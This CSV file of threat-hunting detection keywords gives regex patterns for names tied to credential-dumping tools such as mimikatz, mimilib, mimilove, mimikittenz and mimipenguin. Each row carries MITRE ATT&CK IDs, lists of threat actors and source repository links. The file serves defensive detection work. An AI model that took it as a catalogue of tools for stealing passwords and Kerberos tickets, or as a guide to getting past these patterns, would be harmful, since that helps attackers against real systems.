"*mimikittenz*",".{0,1000}mimikittenz.{0,1000}","offensive_tool_keyword","mimikittenz","mimikittenz is a post-exploitation powershell tool that utilizes the Windows function ReadProcessMemory() in order to extract plain-text passwords from various target processes mimikittenz can also easily extract other kinds of juicy info from target processes using regex patterns including but not limited Encryption Keys & All the other goodstuff","T1003 - T1216 - T1552 - T1002 - T1083","TA0003 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/orlyjamie/mimikittenz","1","1","N/A","N/A","10","10","1840","334","2024-06-28T11:10:03Z","2016-07-04T13:57:18Z","52046"
"*mimilib (mimikatz)*",".{0,1000}mimilib\s\(mimikatz\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#productname","https://www.virustotal.com/gui/file/5191200b2b3d20b4e970acc72cca38d318ca463a88230580a426975a6f73bb49?nocache=1","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52047"
"*mimilib (mimikatz)*",".{0,1000}mimilib\s\(mimikatz\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52048"
"*mimilib for Windows (mimikatz)*",".{0,1000}mimilib\sfor\sWindows\s\(mimikatz\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#description","https://www.virustotal.com/gui/file/5191200b2b3d20b4e970acc72cca38d318ca463a88230580a426975a6f73bb49?nocache=1","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52049"
"*mimilib for Windows (mimikatz)*",".{0,1000}mimilib\sfor\sWindows\s\(mimikatz\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52050"
"*mimilib*",".{0,1000}mimilib.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52051"
"*mimilib.dll*",".{0,1000}mimilib\.dll.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52052"
"*mimilib.dll*",".{0,1000}mimilib\.dll.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52053"
"*mimilib.py*",".{0,1000}mimilib\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","52054"
"*mimilove*",".{0,1000}mimilove.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52055"
"*mimilove.exe*",".{0,1000}mimilove\.exe.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52056"
"*mimilove.vcxproj*",".{0,1000}mimilove\.vcxproj.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52057"
"*mimilove_kerberos*",".{0,1000}mimilove_kerberos.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52058"
"*mimilove_lsasrv*",".{0,1000}mimilove_lsasrv.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52059"
"*mimipenguin.*",".{0,1000}mimipenguin\..{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","52060"
"*mimipenguin.*",".{0,1000}mimipenguin.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","1","#linux","N/A","10","10","3940","644","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z","52061"
"*mimipenguin.cna*",".{0,1000}mimipenguin\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","52062"
"*mimipenguin.git*",".{0,1000}mimipenguin\.git.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52063"
"*MimiPenguin.json*",".{0,1000}MimiPenguin\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","52064"
"*mimipenguin.py*",".{0,1000}mimipenguin\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","52065"
"*mimipenguin.py*",".{0,1000}mimipenguin\.py.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","52066"
"*mimipenguin.sh*",".{0,1000}mimipenguin\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","52067"
"*mimipenguin.so*",".{0,1000}mimipenguin\.so.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","52068"
"*mimipenguin_*.tar.gz*",".{0,1000}mimipenguin_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","1","#linux","N/A","10","10","3940","644","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z","52069"
"*mimipenguin_x32.so*",".{0,1000}mimipenguin_x32\.so.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","52070"
